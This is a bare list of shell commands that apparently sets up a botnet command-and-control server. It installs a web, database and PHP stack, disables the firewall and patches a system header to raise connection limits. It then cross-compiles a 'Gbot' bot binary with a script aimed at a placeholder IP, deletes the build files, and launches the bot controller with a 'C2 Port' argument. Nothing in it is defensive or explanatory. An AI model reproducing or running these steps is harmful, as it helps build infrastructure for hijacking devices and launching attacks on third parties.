[1] yum install python-paramiko nano screen gcc perl wget lbzip unzip -y; service httpd restart; service iptables stop; sed -i s/1024/9999999/g /usr/include/bits/typesizes.h; yum -y install httpd; service httpd start; /sbin/iptables -I INPUT -p tcp --dport 80 -j ACCEPT; /etc/rc.d/init.d/iptables save; yum -y install mysql-server; service mysqld start
[2] /usr/bin/mysql_secure_installation
[3] yum -y install php php-mysql; yum search php-; yum info NameOfTheModule; yum -y install php-mcrypt.x86_64; yum -y install php-mbstring.x86_64; service httpd restart
[4] chmod 777 *; python Compiler.py fff IP HERE Gbot; rm -rf Bot; rm -rf Compiler.py; rm -rf cross-compiler-*
[5] screen -S Gbot ./Gbot [Connection Port] [Threads] [C2 Port]
